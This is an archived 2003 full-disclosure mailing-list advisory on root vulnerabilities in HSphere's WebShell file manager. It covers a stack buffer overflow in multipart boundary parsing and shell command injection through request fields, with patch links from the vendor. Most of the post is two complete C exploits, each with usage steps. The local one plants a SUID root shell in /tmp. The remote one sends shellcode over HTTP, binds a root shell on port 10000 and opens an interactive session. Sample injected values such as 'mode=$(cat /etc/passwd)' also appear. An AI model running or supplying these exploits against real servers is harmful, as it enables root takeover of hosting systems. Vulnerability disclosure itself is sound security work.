Remote root vuln in HSphere WebShell

From: Carl Livitt (carlat_private)
Date: Mon Jan 06 2003 - 04:08:30 PST

  • Next message: galiarept [security-corp]: "[Full-Disclosure] .: Sambar Server Cross-Site Scripting vulnerability :."

    Hi all,
    
    Below is an advisory on a remote (and local) root vulnerability in the HSphere
    product by Positive Software which is used by many web-hosting providers.
    
    The vulnerability is in the WebShell component (installed by default). Proof of
    concept exploits are provided and links to patched versions of WebShell are
    included in the advisory.
    
    Regards,
    
    Carl Livitt
    carl (at) learningshophull.co.uk
    
    ---------------------------------------------------------------
    
    =============================
    SECURITY VULNERABILITY REPORT
    =============================
    
    Product:  HSphere Webshell 20020224 (latest tarball. Earlier versions are
              possibly vulnerable too).
    
    Provider: Positive Software (http://psoft.net)
    
    Impact:   Local & remote root compromise
    
    Platorms: Linux/BSD
    
    
    =================
    Brief description
    =================
    
    Webshell is a web-based application that acts as a file manager for uploading /
    downloading files via FTP. It uses username/password authentication to ensure 
    security. It runs SUID root in Unix environments so that it can read from the
    system shadow password file and change UID to a successfully authenticated 
    user.
    
    There is a pre-authentication buffer overflow in the HTTP header processing 
    code which would allow a malicious user to overwrite data on the stack; this
    can lead to execution of arbitrary code as root.
    
    
    ===========
    More detail
    ===========
    
    The overflow occurs in the CGI::readFile() function of CGI.C when insufficient 
    bounds checking (ie: none at all) is performed on the 'boundary' string:
    
    int CGI::readFile(istream& is, ostream& os, const char* boundary) {
      char b1[255];
      
      strcpy(b1, "\r");
      strcat(b1, boundary);
    
    The 'boundary' string is taken from the data-stream directly after the HTTP 
    headers in the incoming request. For example:
    
    POST /cgi-bin/webshell HTTP/1.1
    Host: www.vulnerablesite.com
    Content-Type: multipart/form-data boundary=AAAAA (300 "A"s)
    Content-Length: 900
    
    --AAAAA (300 "A"s)
    Content-Disposition: form-data; name="TESTNAME"; filename="TESTFILENAME"
    
    
    This would overflow the 'b1' array with 300 "A"s and overwrite the saved
    EIP with 0x41414141. Note that the data that overwrites 'b1' is not taken
    from the 'Content-Type' header, but from the line preceding the
    'Content-Disposition' field. Also note that both boundary tags need to be
    identical for an exploit to succeed.
    
    To ease exploitation, shellcode can be stored in an HTTP header that is
    converted to an environment variable by the webserver (eg. Apache) when
    webshell is executed. An example of such a header is 'Accept-Encoding';
    this is converted to "HTTP_ACCEPT_ENCODING" and can store strings that
    hold enormous amounts of shellcode. The provided exploit uses a small
    port-binding shellcode written by Bighawk.
    
    It should also be noted that webshell does not need to be exploited
    remotely; it is perfectly possible to exploit it locally to elevate user
    privileges to root.
    
    
    =====================
    Other Vulnerabilities
    =====================
    
    Lines 114-117 of 'command.C':
    
      string file = dirname + '/' + cgi.varByName("file");
      string mode = cgi.varByName("mode");
      string tmp=CHMOD+mode+" "+shquote(encodeFileName(file));
      if (0==system(tmp.c_str())) {
    
    A user could execute commands by embedding them in the 'mode'
    field of the HTTP query (eg. 'mode=$(cat /etc/passwd) 0755').
    
    ---------
    Lines 170-228 of 'command2.cc':
    
     void Command::compress(bool download) {
     string zipfile=encodeFileName(cgi.varByName("zipfile"));
     string compression=cgi.varByName("compression");
     .
     .
       if (compression.compare("zip")==0) {
      .
      .
         cmd=ZIP" -q -r -b /tmp "+zipfile+tmp;
       }
     .
     .
     if (!error) {
         if (download)
           html.header("application/x-unknown");
         error= !((chdir(dirname.c_str())==0) && (system(cmd.c_str())==0));
    
    A user could execute commands by embedding them in the 'zipfile'
    field of the HTTP query (eg. 'zipfile=xyzzy`ls -l`').
    
    There are many occurences of this type of error. It should also be
    noted that the encodeFileName() function simply returns the string
    it was passed! It does no encoding at all!
    
    ----------
    Line 16 of diskusage.cc:
    
     size+=diskusage(strcat(strcat(strcpy(file, path), "/"),dir_entry->d_name));
    
    'file' is declared as "char file[1024];" which could probably be used to 
    overflow stack variables, possibly modifying execution path via EIP.
    
    ----------
    In flist() function in flist.C:
    
     char fname[256];
     int esize=strlen(ext);
     int fsize;
     if ((cdir=opendir(dname))!=NULL) {
       while ((cfile=readdir(cdir)) != NULL) {
         if ((esize>=(fsize=strlen(cfile->d_name))) ||
             (strstr(cfile->d_name+fsize-esize,ext)==NULL)) continue;
    
         strcpy(fname, dname);
         strcat(fname, "/");
         strcat(fname, cfile->d_name);
    
    
    fname[] gets overwritten, EIP overwritten etc etc.
    
    
    ========
    Solution
    ========
    
    The vendor response to these issues has been remarkable. In under six
    hours from notification, an updated version of webshell was available 
    for download from the Positive Software website; they have included
    an automatic update tool in addition to the updated WebShell tarball.
    
    Tarball: http://www.hsphere.com/WebShell-2.4.tar.gz
    Update:  http://www.psoft.net/misc/webshell_patch.html
    
    Thanks to Ivor Seletskiy and the team for their excellent coordination
    in responding to and resolving this matter.
    
    
    ===============
    Advisory author
    ===============
    
    Vulnerability discovered by and advisory/exploits written by Carl Livitt.
    
    Mail: carl (at) learningshophull.co.uk
    PGP:
    -----BEGIN PGP PUBLIC KEY BLOCK-----
    Version: GnuPG v1.2.0 (GNU/Linux)
    
    mQGiBD3rgEgRBACkZW1OlRo0Mn+4IZPQWynQ/H27aLysLrXk14fYQjABxhuyGfqA
    N20xSXfpe236BncG0JgGZe1UYgbj1R08MAVnw6cVQGZENxSxs8hFcKClCMoWRqd1
    LU/P3U1MmFJDztCZwjbg61jS0ajRjGRnzgrhxBCZDycD9onYP6BvXPuqqwCg2tPW
    cJmRcLK5GggicNcV1ZQrG70D/3+FNc18TVbZ2/dUjb2Y5d9AGS86FFmQosiuHXpx
    vgQgDseddEeCg/yxETqTAA+gOvY3NKm9wD6sCmakwqg1SYTpeswA8/3ceRaOjJjw
    3VKPbZOSNubCl09Sgp0xqwiM6xSQxozvuQKoxB0zwvJrVEW7KIEG2aHEOocZsFYX
    6IZ2A/9ePnfCOEAiTHs2+gYuoHXUs1+lXgLl1Qv+J0hHdNh50LT5aDx6ih39VXID
    FiKPw3MMznDhdAOW6gOQEA3QJAEn8uQU66xGzlPEkefutWDibd+zT6O54z259xcv
    9VTgiAiNThfucc+KyIA2SKro8FyEQzghZBM4v+sAnN9VZBITCbQpQ2FybCBMaXZp
    dHQgPGNhcmxAbGVhcm5pbmdzaG9waHVsbC5jby51az6IXwQTEQIAHwUCPeuASAUJ
    CWYBgAQLBwMCAxUCAwMWAgECHgECF4AACgkQMeVo6vqTjEsRiQCgiQaL0VSEiEMA
    ZqKvsR8Ctg6y5QwAoNIOTj+CCyGXgys+3secZJLk03LMuQINBD3rgF0QCAC23Kb8
    5HW36DuwtFlM1HJr2RAnbVxPlcmBWNMg+tJDFjGCVbMhiZOR7+4A+JpLNtkAJH8j
    PGCexuBhlVTTgaA2uBwrIVLWDh41IvrZrhafqxhsUywtiGvd1CXD+s2hhvlMbof+
    C/6cbOdriFv+qtJWOwc0i14tb2wA36k7yYdOl0X3+hBGiJyt1DnEQCnT6LanYYtF
    GuvL7T8fO2LHYoTPSvMmdv6l4YSSw3WFXqoodaGeO1rah7cPeBk6+obDeRuzZiLV
    hQxiB2OzNmF1P/NBNqKjUu2kgLrCV6KJtcpJLqgzYgy/p2vx6AXp4oOG74D2Xen/
    /AzGO+FDCNt3Mhc7AAMFB/9DtD1Kq7F5QiYMvLYZGYA7LSiGb/oaq5wxaG5Mc09t
    szqQZMDGVsyuBvJ/zI+YnsHS5yK0vnQ4vrZ2IoAyJAChAuI85yg6eh4tG93ZxhTa
    xBJP9dep4H+cd/ZNawD35nMZte54TBylATezUBXSAecnCGNlY+0M9w4ijXujDAH/
    2eq1S5pyc44sgUsvyXE+UVdOr4c5B5z9OxLynbpE98A11lJP/0NkRGRgVVykfdRw
    8eq9DdaL9NIJyG5mkWEJLPf21vLKFxtU6eeHDVHfv33UiRPKZlFX6rddY6EaGUeS
    a/HD2p/cA/7c5I/R5awZdmc9f7DZc4A6H6qfz6z8NNILiEwEGBECAAwFAj3rgF0F
    CQlmAYAACgkQMeVo6vqTjEutUACghkYYFWPHLdF8IaqBRV7U086XYTsAoNVLwSAl
    +Zf0MoBdqnGDxPXhfLch
    =fp0k
    -----END PGP PUBLIC KEY BLOCK-----
    
    
    ========
    Exploits
    ========
    
    In keeping with full-disclosure, here are two exploits: a local one
    which will elevate any user to r00t, and a remote one which works
    against all tested webshell installations and yields a remote root
    shell on port 10000 (by default).
    
    Both exploits work in a bruteforce manner, which ensures that they
    work more often than not. However, this bruteforcing means that
    the exploits are 'noisy': they leave a lot of mess. Cleaning up
    after this mess is left as an excercise for the reader.
    
    First, the local exploit:
    
    /*
     * Local r00t exploit for Webshell 2.4 (possibly other versions).
     * Vulnerability found and exploit written by Carl Livitt
     * (carl (@) learningshophull.co.uk).
     *
    
    Exploits a simple stack-based buffer overflow in CGI.C of the
    HSphere webshell component which is installed SUID & GUID root
    by default.
    
    Uses a bruteforce method to guess the return address on the stack
    and the amount of data to overflow the buffer with; this ensures
    it works under many different environments. I originally hardcoded
    these values, but found that this was unreliable.
    
    Copy this file (webshell-local.c) to /tmp and then:
    
    cd /tmp
    gcc -o webshell-local webshell-local.c
    cd /path/to/the/webshell/directory
    /tmp/webshell-local
    
    That should get you r00t without any messing about.
    
    */
    
    
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <signal.h>
    
    #define EGG_SIZE_START 257
    #define EGG_SIZE_END 291
    #define RET_ADDR_START 0xbfffe910
    #define RET_ADDR_END 0xbfffffff
    #define RET_ADDR_INCREMENT 256
    #define CONTENT_LENGTH 42
    #define SHELLSCRIPT_FILE "/tmp/zz"
    #define EXPLOIT_FILE "/tmp/.webshell.txt"
    #define ROOT_SHELL "/tmp/rs"
    #define WEBSHELL_PROGRAM "./webshell"
    
    void create_shellscript_file();
    void make_shellcode();
    void make_exploit_buffer();
    void setup_environment();
    void make_exploit_file();
    
    char shellcode[] =
            "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // setuid(0)
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
            "\x80\xe8\xdc\xff\xff\xff/tmp/zz"; // aleph1 execve() of /bin/sh
    
    char sc[1024];
    char egg[1024];
    
    char shell_script[]=
            "#!/bin/sh\n"
            "cd /tmp\n"
            "cat << ROOTSHELL > "ROOT_SHELL".c\n"
            "main() { setuid(0);setgid(0);system(\"/bin/bash\");}\n"
            "ROOTSHELL\n"
            "gcc -o "ROOT_SHELL" "ROOT_SHELL".c\n"
            "chown root:root "ROOT_SHELL"*\n"
            "chmod 6777 "ROOT_SHELL"\n"
            "chmod 0666 "ROOT_SHELL".c\n";
    
    char greeting[]="Webshell 2.4 bruteforce exploit for Linux x86 - by Carl Livitt\n";
    
    int EGG_SIZE=EGG_SIZE_START;
    unsigned long RET_ADDR=(unsigned long)RET_ADDR_START;
    char *env[4];
    
    /*
     * The fun begins here...
     */
    
    main(int argc, char **argv) {
            int brute_force_mode=1, status, pid;
            struct stat s;
    
            /*
             * Check to see if the exploit has been run before...
             */
            if(stat((char *)ROOT_SHELL,&s)==0) {
                    printf("Root shell already exists... executing...\n");
                    system(ROOT_SHELL);
                    exit(0);
            }
    
            /*
             * Make sure that the webshell binary can be found
             * and is SUID root
             */
            if(stat(WEBSHELL_PROGRAM, &s)!=0) {
                    printf(WEBSHELL_PROGRAM" not found!\n");
                    exit(1);
            } else if(!(s.st_mode&S_ISUID)) {
                    printf(WEBSHELL_PROGRAM" is not SUID root!\n");
                    exit(1);
            }
    
            /*
             * Start the bruteforce loop...
             */
            printf("%s\nBruteforcing EGG_SIZE and RET_ADDR..", greeting);
            do {
                    // setup exploit buffers
                    make_shellcode();
                    make_exploit_buffer();
                    setup_environment();
                    make_exploit_file();
                    create_shellscript_file();
                    printf(".");fflush(stdout);
    
                    // fork and execute the webshell binary, passing it the
                    // exploit input.
                    if((pid=fork())==0) {
                            system(WEBSHELL_PROGRAM" < "EXPLOIT_FILE" &>/dev/null");
                            exit(0);
                    } else {
                            waitpid(pid, &status, 0);
                    }
    
                    // If ROOT_SHELL exists, then the exploit was successful.
                    // So execute it!
                    if(stat((char *)ROOT_SHELL,&s)==0) {
                            printf("\nEntering r00t shell...\n\n");
                            system(ROOT_SHELL);
                            exit(0);
                    }
    
                    // The ROOT_SHELL did not exist, so adjust the bruteforce
                    // parameters and continue...
                    EGG_SIZE++;
                    if(EGG_SIZE>EGG_SIZE_END) {
                            RET_ADDR+=RET_ADDR_INCREMENT;
                            if(RET_ADDR>RET_ADDR_END) {
                                    printf("Leaving bruteforce mode...\n");
                                    brute_force_mode=0;
                            } else {
                                    EGG_SIZE=EGG_SIZE_START;
                            }
                    }
            } while(brute_force_mode);
            printf("Bruteforce exhausted - EXPLOIT FAILED.\n");
    }
    
    /*
     * Creates the file to be used as stdin for webshell.
     */
    void make_exploit_file() {
            FILE *fp;
    
            if((fp=fopen(EXPLOIT_FILE,"w"))==NULL) {
                    printf("Could not create exploit file %s\n", EXPLOIT_FILE);
                    exit(1);
            }
            fprintf(fp, "--%s\n", egg+CONTENT_LENGTH);
            fprintf(fp, "Content-Disposition: form-data; name=\"TESTNAME\"; filename=\"TESTFILENAME\"\r\n\r\n");
            fclose(fp);
    }
    
    /*
     * Create the malicious environment in which webshell will run
     */
    void setup_environment() {
            int i;
    
            unsetenv("S");
            unsetenv("CONTENT_LENGTH");
            unsetenv("REQUEST_METHOD");
            unsetenv("CONTENT_TYPE");
            env[0]=strdup(egg);
            env[1]=strdup(sc);
            env[2]=strdup("CONTENT_LENGTH=261");
            env[3]=strdup("REQUEST_METHOD=POST");
            env[4]=NULL;
            for(i=0;i<4;i++)
                    putenv(env[i]);
    }
    
    /*
     * It is the 'boundary' section of a multipart/form-data MIME type
     * that overflows the buffer in webshell. This function creates the
     * malicious boundary.
     */
    void make_exploit_buffer() {
            int i;
    
            memset(egg, 0, EGG_SIZE-1);
            memcpy(egg, "CONTENT_TYPE=multipart/form-data boundary=", CONTENT_LENGTH);
            for(i=0;i<EGG_SIZE; i+=4) {
                    egg[i+CONTENT_LENGTH]=RET_ADDR&0xff;
                    egg[i+CONTENT_LENGTH+1]=(RET_ADDR>>8)&0xff;
                    egg[i+CONTENT_LENGTH+2]=(RET_ADDR>>16)&0xff;
                    egg[i+CONTENT_LENGTH+3]=(RET_ADDR>>24)&0xff;
            }
            egg[EGG_SIZE+CONTENT_LENGTH-1]='\0';
    }
    
    /*
     * Makes a 1024-byte buffer filled with NOPs and shellcode
     */
    void make_shellcode() {
            memset(sc, 0x90,1024);
            sc[0]='S';
            sc[1]='=';
            memcpy(sc + 1024 - (strlen(shellcode)+1), shellcode, strlen(shellcode));
            sc[1023]='\0';
    }
    
    /*
     * Generate the shellscript that will be executed by the shellcode.
     * By default, it will create a SUID root shell in /tmp
     */
    void create_shellscript_file() {
            FILE *fp;
    
            if((fp=fopen(SHELLSCRIPT_FILE,"w"))==NULL) {
                    printf("Could not create %s\n", SHELLSCRIPT_FILE);
                    exit(1);
            }
            fprintf(fp, "%s", shell_script);
            fclose(fp);
            chmod(SHELLSCRIPT_FILE, S_IXOTH | S_IROTH | S_IWOTH | S_IXUSR | S_IRUSR | S_IWUSR);
    }
    
    
    
    
    ==================
    The remote exploit
    ==================
    
    
    
    
    /*
     * Remote r00t exploit for Webshell 2.4 (possibly other versions).
     * Vulnerability found and exploit written by Carl Livitt 
     * (carl (@) learningshophull.co.uk).
     *
    
    Exploits a simple stack-based buffer overflow in CGI.C of the
    HSphere webshell component which is installed SUID & GUID root 
    by default.
    
    This exploit will bind a r00t shell to port 10000 (by default) of
    the remote box. Feel free to use any shellcode of your choice.
    
    This code is a butchered version of the local exploit for
    webshell. It works on my test box, and won't be refined any further,
    although the bruteforcer should work on most webshell installations.
    
    To exploit:
    
    gcc -o webshell-remote webshell-remote.c
    ./webshell-remote -t www.host-to-exploit.com -l /path/to/webshell
    
    That's it. It'll work on almost all vulnerable hosts (running Linux).
    */
    
    
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/socket.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <signal.h>
    #include <netdb.h>
    #include <time.h>
    
    /*
     * Play with these to make it work (if it fails!)
     */
    #define EGG_SIZE_START 280
    #define EGG_SIZE_END 291
    #define RET_ADDR_START 0xbffff010
    #define RET_ADDR_END 0xbfffffff
    #define RET_ADDR_INCR 768
    #define COMMAND1 "id\n"
    #define COMMAND2 "uname -a\n"
    #define ROOT_SHELL_PORT 10000
    
    // should only be needed against localhost. Set to 0 to disable.
    #define SLEEP_TIME 125000000L 
    
    // don't play with this, you'll only break things.
    #define CONTENT_LENGTH 43
    
    void make_shellcode();
    void make_exploit_buffer();
    void make_boundary_buffer();
    
    /*
     * 88 bytes portbinding shellcode - linux-x86
     * - by bighawk (bighawkat_private)
     *   setuid(0) and setgid(0) added by Carl Livitt
     */
    char shellcode[] =
       "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80" // setuid(0),setgid(0)
       "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
       "\x89\xc7\x52\x66\x68"
       "XX" // XX is port number
       "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51"	
       "\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57"	
       "\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"		
       "\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"			
       "\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; // bind shell on port 10000		
    
    /*
     * Ahhhh, global variables make life easy :)
     */
    char sc[1024];
    char egg[1024];
    char exploit_buf[4096];
    char target[256];
    int port=80;
    char location[1024];
    unsigned long RET_ADDR;
    int EGG_SIZE, root_shell_port=ROOT_SHELL_PORT;
    
    char usage[]=
    "-h           This cruft\n"
    "-t host      Target host (eg. www.xyzzy.com)\n"
    "-p port      Target port [80]\n"
    "-P port      Port to bind shell on remote host [10000]\n"
    "-l location  Location of webshell (eg. /cgi-bin/webshell)\n\n"
    "Example:\n\n"
    "./exp-remote -t www.xyzzy.com -p 8080 -P 12345 -l /psoft/servlet/psoft.hsphere.CP\n\n"
    "This would attack http://www.xyzzy.com:8080/psoft/servlet/psoft.hsphere.CP\n"
    "and bind a root shell to port 12345 if successful.\n\n";
    
    /*
     * The fun begins here...
     */
    
     main(int argc, char **argv) {
    	int ch, websock, shellsock,r=1;
    	struct hostent *host;
    	struct sockaddr_in saddr;
    	char buf[8092];
    	struct timespec sleepTime;
    	fd_set rfds;
    	int retval;
    		
    	/*
    	 * Process command-line args
    	 */
    	while((ch=getopt(argc,argv,"ht:p:P:l:"))!=-1) {
    		switch(ch) {
    			case 'h':
    				printf("%s",usage);
    				exit(0);
    				break;
    			case 't':
    				strncpy(target, optarg, sizeof(target)-1);
    				break;
    			case 'p':
    				port=atoi(optarg);
    				break;
    			case 'P':
    				root_shell_port=atoi(optarg);
    				break;
    			case 'l':
    				strncpy(location, optarg, sizeof(location)-1);
    				break;
    			default:
    				printf("%s", usage);
    				exit(0);
    				break;
    		}
    	}	
    	
    	/*
    	 * Tell the attacker we're about to start the exploit.
    	 * Look up the IP address of the host specified on the
    	 * command-line
    	 */
    	if((host=gethostbyname(target))==NULL) {
    		printf("Host not found. Usage:\n%s\n", usage);
    		exit(1);
    	}
    	printf("Exploiting http://%s:%d%s%s..", target, port, (location[0]=='/')?"":"/", location);
    	
    	/*
    	 * Start the bruteforce loop
    	 */
    	for(RET_ADDR=RET_ADDR_START; RET_ADDR<RET_ADDR_END; RET_ADDR+=RET_ADDR_INCR) {
    		for(EGG_SIZE=EGG_SIZE_START; EGG_SIZE<EGG_SIZE_END; EGG_SIZE++) {
    			/*
    		 	 * Setup the exploit strings and
    	 		 * HTTP headers. The Accept-Encoding header
    	 		 * will hold shellcode: it will be passed
    	 		 * to the environment of webshell giving us
    	 		 * a reasonably predictable RET address.
    	 		 */
    			make_shellcode();
    			make_boundary_buffer();
    			make_exploit_buffer();
    		
    			/*
    	 		 * Now connect to the host and send the exploit
    	 		 * string...
    	 		 */
    			if((websock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) {
    				perror("socket()");
    				exit(1);
    			}
    			memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
    			saddr.sin_family=AF_INET;
    			saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
    			saddr.sin_port=htons(port);
    			printf(".");fflush(stdout);
    			if(connect(websock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
    				perror("connect()");
    				exit(1);
    			}
    			send(websock, exploit_buf, strlen(exploit_buf), 0);
    			close(websock);
    			
    			/*
    			 * This pause is needed when exploiting localhost.
    			 * It can be ignored against remote hosts (I think!)
    			 */			
    			sleepTime.tv_sec=0;
    			sleepTime.tv_nsec=SLEEP_TIME;
    			nanosleep(&sleepTime, &sleepTime);
    		
    			/*
    	 		 * If the exploit attempt succeded, there should now 
    			 * be a r00t shell bound to port xxxxx of the target 
    			 * box. Lets try and connect to it...
    	 		 */
    			if((shellsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) {
    				perror("socket()");
    				exit(1);
    			}
    			memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
    			saddr.sin_family=AF_INET;
    			saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
    			saddr.sin_port=htons(root_shell_port);
    			if(connect(shellsock, (struct sockaddr *)&saddr, sizeof(saddr))==0)
    				goto CONNECTED; // goto? Damn amateurs...
    				
    			/* 
    			 * If we get here, the exploit failed. Try the next 
    			 * iteration of the brute force loop.
    			 */
    			close(shellsock);
    		}
    	}
    	/*
    	 * If we get here, then the bruteforce was exhausted without a
    	 * succesful exploit.
    	 */
    	printf("\nFailed to exploit the webshell binary. :(\n");
    	exit(0);
    
    CONNECTED:
    	/*
    	 * We're now connected to the remote host. Issue
    	 * some commands... ('id' and 'uname -a' by default)
    	 */
    	printf("\n\nExploit successful!\nIssuing some commands...\n\n");
    	if(send(shellsock, COMMAND1, strlen(COMMAND1), 0)==-1) {
    		perror("send()");
    		exit(1);
    	}
    	buf[recv(shellsock, buf, sizeof(buf)-1, 0)]='\0';
    	printf("%s", buf);
    	send(shellsock, COMMAND2, strlen(COMMAND2), 0);
    	buf[recv(shellsock, buf, sizeof(buf)-1, 0)]='\0';
    	printf("%s\n", buf);
    	printf("You are now at a bash prompt...\n");
    	
    	/*
    	 * Now let the attacker issue commands to the remote
    	 * shell, just as if (s)he had launched 'nc host 10000'.
    	 * Note the dodgy coding of assigning NULLs to the buf[]
    	 * array. What would happen if recv() or read() returned -1 ?
    	 * You guessed it: we mung some variables on the stack!
    	 */
    	do {
    		FD_ZERO(&rfds);
    		FD_SET(0, &rfds);
    		FD_SET(shellsock, &rfds);
    		retval=select(shellsock+1, &rfds, NULL, NULL, NULL);
    		if(retval) {
    			if(FD_ISSET(shellsock, &rfds)) {
    				buf[(r=recv(shellsock, buf, sizeof(buf)-1,0))]='\0';
    				printf("%s", buf);
    			}
    			if(FD_ISSET(0, &rfds)) {
    				buf[(r=read(0, buf, sizeof(buf)-1))]='\0';
    				send(shellsock, buf, strlen(buf), 0);
    			}
    			
    		}
    	} while(retval && r); // loop until connection terminates
    	close(shellsock);
    	exit(0);
    }	
    
    /*
     * Create the HTTP request that will setup the exploit
     * conditions in webshell. Shellcode is stored in the 
     * Accept-Encoding HTTP header.
     */
    void make_exploit_buffer() {
    	sprintf(exploit_buf,"POST %s HTTP/1.1\n",location);
    	sprintf(exploit_buf,"%sHost: %s\n",exploit_buf,target);
    	sprintf(exploit_buf,"%sAccept-Encoding: %s\n",exploit_buf, sc);
    	sprintf(exploit_buf,"%s%s\n",exploit_buf,egg);
    	sprintf(exploit_buf,"%sContent-Length: %d\n\n",exploit_buf,EGG_SIZE*2);
    	sprintf(exploit_buf,"%s--%s\n",exploit_buf, egg+CONTENT_LENGTH);
    	sprintf(exploit_buf,"%sContent-Disposition: form-data; name=\"TESTNAME\"; filename=\"TESTFILENAME\"\r\n\r\n",exploit_buf);
    	sprintf(exploit_buf,"%s%-*s\n",exploit_buf, EGG_SIZE*4," ");
    }
    
    /*
     * Create the buffer that holds the 'boundary' data. This
     * is what actually overflows the buffer on the stack.
    */ 
    void make_boundary_buffer() {
    	int i;
    
    	memset(egg, 0, EGG_SIZE-1);
    	memcpy(egg, "Content-Type: multipart/form-data boundary=", CONTENT_LENGTH);
    	for(i=0;i<EGG_SIZE; i+=4) {
    		egg[i+CONTENT_LENGTH]=RET_ADDR&0xff;
    		egg[i+CONTENT_LENGTH+1]=(RET_ADDR>>8)&0xff;
    		egg[i+CONTENT_LENGTH+2]=(RET_ADDR>>16)&0xff;
    		egg[i+CONTENT_LENGTH+3]=(RET_ADDR>>24)&0xff;
    	}
    	egg[EGG_SIZE+CONTENT_LENGTH-1]='\0';
    }
    
    /*
     * Creates a 1024-byte buffer holding NOPs and shellcode.
     */
    void make_shellcode() {
    	// Fill in the port number
    	shellcode[33]=htons(root_shell_port)&0xff;
    	shellcode[34]=(htons(root_shell_port)>>8)&0xff;
    
    	// Finish making shellcode buffer
    	memset(sc, 0x90,1024);
    	memcpy(sc + 1024 - (strlen(shellcode)+1), shellcode, strlen(shellcode));
    	sc[1023]='\0';
    }
    



    This archive was generated by hypermail 2b30 : Sun Jan 19 2003 - 13:35:37 PST